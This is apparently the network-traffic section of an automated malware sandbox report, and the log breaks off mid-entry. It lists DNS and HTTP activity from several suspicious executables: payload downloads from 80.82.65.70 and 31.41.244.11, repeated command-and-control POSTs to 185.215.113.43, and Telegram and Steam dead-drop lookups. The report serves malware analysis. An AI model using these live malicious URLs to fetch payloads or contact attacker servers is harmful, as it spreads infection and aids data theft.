                      142.250.179.110
                      youtube-ui.l.google.com
                      IN A
                      142.250.74.238
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.206
                    • flag-us
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                      Response
                      youtube-ui.l.google.com
                      IN A
                      216.58.215.46
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.206
                      youtube-ui.l.google.com
                      IN A
                      172.217.18.206
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.78
                      youtube-ui.l.google.com
                      IN A
                      216.58.213.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.110
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.174
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.75.238
                      youtube-ui.l.google.com
                      IN A
                      142.250.74.238
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.178.142
                      youtube-ui.l.google.com
                      IN A
                      142.250.201.174
                    • flag-us
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN AAAA
                      Response
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:810::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:808::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:80e::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:80c::200e
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-fr
                      GET
                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                      firefox.exe
                      Remote address:
                      142.250.179.110:443
                      Request
                      GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                      host: consent.youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      cookie: YSC=TFrx57vzYjQ
                      cookie: SOCS=CAAaBgiA8u26Bg
                      cookie: __Secure-YEC=CgtSdnpBSkZQMWlDbyjI9e26BjIKCgJHQhIEGgAgPg%3D%3D
                      cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgPg%3D%3D
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN AAAA
                      Response
                      consent.youtube.com
                      IN AAAA
                      2a00:1450:4007:818::200e
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                      Response
                      www.google.com
                      IN A
                      172.217.20.164
                    • flag-fr
                      GET
                      https://www.google.com/favicon.ico
                      firefox.exe
                      Remote address:
                      172.217.20.164:443
                      Request
                      GET /favicon.ico HTTP/2.0
                      host: www.google.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: image/avif,image/webp,*/*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      referer: https://consent.youtube.com/
                      sec-fetch-dest: image
                      sec-fetch-mode: no-cors
                      sec-fetch-site: cross-site
                      te: trailers
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                      Response
                      www.google.com
                      IN A
                      172.217.20.164
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN AAAA
                      Response
                      www.google.com
                      IN AAAA
                      2a00:1450:4007:80c::2004
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-nl
                      GET
                      http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:49 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/dll/key
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /dll/key HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:49 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 21
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/dll/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /dll/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:49 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                      Content-Length: 97296
                      Keep-Alive: timeout=5, max=98
                      Connection: Keep-Alive
                      Content-Type: application/octet-stream
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:50 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=97
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:52 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=96
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:54 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=95
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:56 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=94
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:58 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=93
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:00 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=92
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:03 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=91
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:05 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=90
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:07 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=89
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:09 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=88
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:11 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=87
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/soft/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /soft/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: d
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:14 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Disposition: attachment; filename="dll";
                      Content-Length: 242176
                      Keep-Alive: timeout=5, max=86
                      Connection: Keep-Alive
                      Content-Type: application/octet-stream
                    • flag-nl
                      GET
                      http://80.82.65.70/soft/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /soft/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: s
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:15 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Disposition: attachment; filename="soft";
                      Content-Length: 1502720
                      Keep-Alive: timeout=5, max=85
                      Connection: Keep-Alive
                      Content-Type: application/octet-stream
                    • flag-us
                      DNS
                      prod.balrog.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN A
                      Response
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN A
                      35.244.181.201
                    • flag-us
                      DNS
                      prod.balrog.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      ciscobinary.openh264.org
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      ciscobinary.openh264.org
                      IN A
                      Response
                      ciscobinary.openh264.org
                      IN CNAME
                      a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                      a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                      IN CNAME
                      a17.rackcdn.com
                      a17.rackcdn.com
                      IN CNAME
                      a17.rackcdn.com.mdc.edgesuite.net
                      a17.rackcdn.com.mdc.edgesuite.net
                      IN CNAME
                      a19.dscg10.akamai.net
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.155
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.209
                    • flag-gb
                      GET
                      http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                      firefox.exe
                      Remote address:
                      88.221.134.155:80
                      Request
                      GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                      Host: ciscobinary.openh264.org
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      Accept: */*
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Connection: keep-alive
                      Response
                      HTTP/1.1 200 OK
                      Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                      ETag: 85430baed3398695717b0263807cf97c
                      Content-Length: 453023
                      Accept-Ranges: bytes
                      X-Timestamp: 1731034347.00215
                      Content-Type: application/zip
                      X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                      Cache-Control: public, max-age=252672
                      Expires: Sun, 15 Dec 2024 22:19:06 GMT
                      Date: Fri, 13 Dec 2024 00:07:54 GMT
                      Connection: keep-alive
                    • flag-us
                      DNS
                      a19.dscg10.akamai.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN A
                      Response
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.209
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.155
                    • flag-us
                      DNS
                      a19.dscg10.akamai.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN AAAA
                      Response
                      a19.dscg10.akamai.net
                      IN AAAA
                      2a02:26f0:a1::58dd:86d1
                      a19.dscg10.akamai.net
                      IN AAAA
                      2a02:26f0:a1::58dd:869b
                    • flag-us
                      DNS
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                      Response
                      redirector.gvt1.com
                      IN A
                      172.217.20.174
                    • flag-us
                      DNS
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                      Response
                      redirector.gvt1.com
                      IN A
                      172.217.20.174
                    • flag-us
                      DNS
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN AAAA
                      Response
                      redirector.gvt1.com
                      IN AAAA
                      2a00:1450:4007:80c::200e
                    • flag-us
                      DNS
                      r1---sn-5hnekn76.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      r1---sn-5hnekn76.gvt1.com
                      IN A
                      Response
                      r1---sn-5hnekn76.gvt1.com
                      IN CNAME
                      r1.sn-5hnekn76.gvt1.com
                      r1.sn-5hnekn76.gvt1.com
                      IN A
                      209.85.226.6
                    • flag-us
                      DNS
                      r1.sn-5hnekn76.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      r1.sn-5hnekn76.gvt1.com
                      IN A
                      Response
                      r1.sn-5hnekn76.gvt1.com
                      IN A
                      209.85.226.6
                    • flag-us
                      DNS
                      r1.sn-5hnekn76.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      r1.sn-5hnekn76.gvt1.com
                      IN AAAA
                      Response
                      r1.sn-5hnekn76.gvt1.com
                      IN AAAA
                      2a00:1450:400e::6
                    • flag-us
                      DNS
                      play.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN A
                      Response
                      play.google.com
                      IN A
                      216.58.214.174
                    • flag-us
                      DNS
                      play.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN A
                      Response
                      play.google.com
                      IN A
                      216.58.214.174
                    • flag-fr
                      POST
                      https://play.google.com/log?hasfast=true&authuser=0&format=json
                      firefox.exe
                      Remote address:
                      216.58.214.174:443
                      Request
                      POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                      host: play.google.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: */*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      referer: https://consent.youtube.com/
                      content-type: text/plain;charset=UTF-8
                      content-length: 741
                      origin: https://consent.youtube.com
                      sec-fetch-dest: empty
                      sec-fetch-mode: no-cors
                      sec-fetch-site: cross-site
                      te: trailers
                    • flag-us
                      DNS
                      play.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN AAAA
                      Response
                      play.google.com
                      IN AAAA
                      2a00:1450:4007:80e::200e
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • 185.215.113.43:80
                      http://185.215.113.43/Zu7JuNko/index.php
                      http
                      skotes.exe
                      3.4kB
                      5.1kB
                      28
                      20

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200
                    • 31.41.244.11:80
                      http://31.41.244.11/files/unique2/random.exe
                      http
                      skotes.exe
                      255.6kB
                      13.4MB
                      5195
                      13585

                      HTTP Request

                      GET http://31.41.244.11/files/6904700471/9JTVo50.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/burpin1/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/fate/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/encoxx/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/hell911/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/unique2/random.exe

                      HTTP Response

                      200
                    • 172.67.139.78:443
                      https://drive-connect.cyou/api
                      tls, http
                      45c3c2bb5b.exe
                      1.0kB
                      4.3kB
                      10
                      9

                      HTTP Request

                      POST https://drive-connect.cyou/api

                      HTTP Response

                      200
                    • 149.154.167.99:443
                      t.me
                      tls
                      4b025ca5ea.exe
                      385 B
                      219 B
                      5
                      5
                    • 149.154.167.99:443
                      t.me
                      tls
                      4b025ca5ea.exe
                      347 B
                      219 B
                      5
                      5
                    • 149.154.167.99:443
                      t.me
                      tls
                      4b025ca5ea.exe
                      288 B
                      219 B
                      5
                      5
                    • 149.154.167.99:443
                      t.me
                      4b025ca5ea.exe
                      190 B
                      92 B
                      4
                      2
                    • 23.214.143.155:443
                      https://steamcommunity.com/profiles/76561199807592927
                      tls, http
                      4b025ca5ea.exe
                      1.5kB
                      42.7kB
                      24
                      37

                      HTTP Request

                      GET https://steamcommunity.com/profiles/76561199807592927

                      HTTP Response

                      200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.5kB
                      2.1kB
                      9
                      8

                      HTTP Request

                      GET https://95.216.181.44/

                      HTTP Response

                      200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.3kB
                      698 B
                      8
                      7

                      HTTP Request

                      POST https://95.216.181.44/

                      HTTP Response

                      200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.3kB
                      698 B
                      8
                      7

                      HTTP Request

                      POST https://95.216.181.44/

                      HTTP Response

                      200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
